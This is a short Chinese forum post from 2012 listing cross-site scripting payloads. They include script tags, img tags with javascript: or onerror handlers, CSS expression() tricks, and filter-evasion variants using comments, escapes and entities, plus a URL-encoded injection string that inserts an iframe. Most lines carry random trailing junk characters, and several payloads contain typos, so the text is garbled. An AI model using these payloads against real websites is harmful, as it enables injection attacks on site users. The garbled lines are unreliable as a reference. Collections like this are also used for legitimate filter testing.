<script>alert("跨站")</script> (最常用)' w/ F: l/ t* o T5 q
<img scr=javascript:alert("跨站")></img>% W& [" w: c5 @1 f. Z! {3 y& `
<img scr="javascript: alert(/跨站/)></img>6 l ^+ }9 C7 l7 C
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)2 y2 O. i* T8 o, m
<img scr="#" onerror=alert(/跨站/)></img>
" g, r1 Z$ y6 Q1 P# v1 u; w<img scr="#" style="xss:expression(alert(/xss/));"></img>
+ x0 ^/ W. ~* Z+ }: w! V<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
* K9 t5 C! y/ `! r<img src=vbscript:msgbox ("xss")></img>! G4 X+ v1 n% c- C* r g1 S! h7 ]2 N) f
<style> input {left:expression (alert('xss'))}</style>7 s7 V$ x7 S; {) `0 ^4 k3 D1 B6 w% k
<div style={left:expression (alert('xss'))}></div>
0 D T! i9 k& S<div style={left:exp/* */ression (alert('xss'))}></div>
% e) y8 V6 l. ~. y<div style={left:\0065\0078ression (alert('xss'))}></div>
; L- U0 d$ P J+ s% \html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 S* X- W: u( ], f" u
unicode <div style="{left:expRessioN (alert('xss'))}">5 w) E& V! q9 o7 @5 y! o
5 q o1 x: k/ M( @. N
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
! |( `* q3 g) H0 s' F |
发表于 2012-9-15 14:09:13
收藏
支持
反对